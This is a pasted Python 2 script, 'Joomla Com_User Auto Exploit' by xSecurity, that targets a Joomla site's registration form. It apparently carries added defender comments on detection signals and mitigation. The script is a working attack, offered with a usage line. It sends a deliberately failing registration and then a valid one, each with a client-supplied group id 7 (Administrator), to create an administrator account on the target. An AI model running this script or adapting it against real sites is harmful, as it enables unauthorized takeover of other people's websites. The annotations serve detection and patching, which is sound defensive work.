
barata123

a guest
Aug 19th, 2016
  1. #!/usr/bin/python
  2. # Joomla Com_User Auto Exploit =D
  3. # By xSecurity
  4.  
  5. import requests as sec4ever, re, urllib, sys, os
  6. from threading import Thread
  7. from time import sleep
  # Clear the terminal before the banner is printed. The list is indexed by the
  # boolean `os.name == 'nt'`, so this runs `cls` on Windows and `clear`
  # everywhere else. Cosmetic local helper only; it sends nothing to the target.
  8. def cls():
  9. os.system(['clear','cls'][os.name =='nt'])
  10.  
  # Clear the screen, then print the tool banner. This is a Python 2 `print`
  # statement, so the script does not run unmodified on Python 3. The banner is
  # only written to the local terminal (author handle, site names, greets); none
  # of this text is placed in a request by the lines shown here.
  11. cls()
  12. print '''
  13. __ _ _
  14. __ __/ _\ ___ ___ _ _ _ __(_) |_ _ _
  15. \ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
  16. > < _\ \ __/ (__| |_| | | | | |_| |_| |
  17. /_/\_\\__/\___|\___|\__,_ |_| |_|\__|\__, |
  18. |___/Joomla [Com_User] Auto Exploit =D
  19. #Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
  20. #Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
  21. Special For My Lov3r Cyber-Crystal
  22. #Note: U Need Install Requests Package: http://www.youtube.com/ watch?v=Ng5T18HyA-Q'''
  23.  
  # Hard-coded filler value passed to one() as the deliberately mismatching
  # "confirm password". It is sent verbatim in that request body, so the literal
  # is a static indicator of this tool in captured registration POST data.
  24. pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
  # Stage 1 of 2: submit a registration that is built to fail validation.
  #
  # Fetches the Joomla registration page, scrapes the name of the hidden field
  # whose value is "1" (the per-session form token), and POSTs a registration
  # form in which password1 (pwd1) and password2 (pwd2) differ.
  # Reads the module-level globals `xsec` (the shared requests session) and
  # `user`; `user` is not a parameter. Returns None; p1 and x2 are never inspected.
  #
  # Defender notes:
  # - The POST carries a client-supplied `jform[groups][]` value. A stock public
  #   registration form is not expected to submit that field (confirm against the
  #   site's template), so its presence in a registration POST is a strong
  #   detection signal for request logs or a WAF rule.
  # - NOTE(review): presumably the rejected submission's data is kept in the
  #   visitor's session and reused by the next submission; that server-side
  #   behavior is not shown in this file, so confirm against the vendor advisory.
  # - Mitigation sits on the server: run a Joomla release containing the vendor
  #   fix, disable self-registration where it is not needed, and audit membership
  #   of privileged groups for unexpected accounts.
  25. def one(target,pwd1,pwd2,email):
  26. # Wrong Password
  27. x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
  # Hidden input with value "1": its name is used below as the form-token field.
  28. token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
  29. post = {}
  # Fixed display name: every account created by this tool is named 'xSecurity',
  # which makes it searchable in the user table.
  30. post["jform[name]"] = 'xSecurity'
  31. post["jform[username]"] = user
  # password1 != password2 in this stage, so validation is expected to reject it.
  32. post["jform[password1]"] = pwd1
  33. post["jform[password2]"] = pwd2
  34. post["jform[email1]"] = email
  35. post["jform[email2]"] = email
  # Client-chosen group id. NOTE(review): id 7 is the Administrator group in a
  # default Joomla install - confirm against the site's user-group table.
  36. post["jform[groups][]"] = "7"
  37. post["option"] = "com_users"
  38. post["task"] = "registration.register"
  39. post[token[0]] = "1"
  40. p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
  41. x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
  42.  
  # Stage 2 of 2: submit the same registration again, this time with matching
  # passwords so that it can pass validation.
  #
  # Identical to one() except that both password fields carry pwd1; the pwd2
  # parameter is accepted but unused. Reads the module-level globals `xsec` and
  # `user`. There is no return statement, so the function returns None, and the
  # responses p2/x4 are never checked - the script cannot tell whether the
  # account was created or which group it landed in.
  #
  # Defender notes:
  # - Seen from the server, the pattern is two registration POSTs for the same
  #   username on the same session cookie in quick succession, the first
  #   rejected, both carrying `jform[groups][]`.
  # - After patching, review recently registered accounts for privileged group
  #   membership, and for the fixed display name used below.
  43. def exploit(target,pwd1,pwd2,email):
  # Comment inherited from one(); in this stage the two passwords match.
  44. # Wrong Password
  45. x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
  # The token field name is scraped again from a fresh copy of the form.
  46. token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
  47. post = {}
  48. post["jform[name]"] = 'xSecurity'
  49. post["jform[username]"] = user
  50. post["jform[password1]"] = pwd1
  51. post["jform[password2]"] = pwd1
  52. post["jform[email1]"] = email
  53. post["jform[email2]"] = email
  # Same client-chosen group id as in stage 1. NOTE(review): id 7 is the
  # Administrator group in a default Joomla install - confirm per site.
  54. post["jform[groups][]"] = "7"
  55. post["option"] = "com_users"
  56. post["task"] = "registration.register"
  57. post[token[0]] = "1"
  58. p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
  59. x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
  60.  
  # Script entry point. One requests session is shared by both stages, so any
  # cookie the target sets during stage 1 is sent again in stage 2. No headers
  # are set anywhere in the script. NOTE(review): the requests library then sends
  # its default python-requests User-Agent, which is a cheap log filter - confirm
  # for the library version in use.
  61. xsec = sec4ever.session()
  # Exactly four arguments are required: base URL, username, password, e-mail.
  62. if len(sys.argv) == 5:
  63. target = sys.argv[1]
  64. user = sys.argv[2]
  65. pwd1 = sys.argv[3]
  66. email = sys.argv[4]
  # Order matters: the failing submission is sent first, then the valid one.
  67. one(target,pwd1,pwd2,email)
  # exploit() returns None, so `ex` is always None and is never used.
  68. ex = exploit(target,pwd1,pwd2,email)
  # Printed unconditionally; it does not show that the registration worked.
  # Per the message, the account still has to be activated through the e-mail
  # link, so sites that require admin approval or have registration disabled add
  # a further barrier.
  69. print '[*] Go To Your Email & Active Then Login =D\nUsername: '+user+' & Password: '+pwd1
  70. else:
  71. print "Usage: python tool.py http://target.com/j0s/ youruser yourpass yourmail"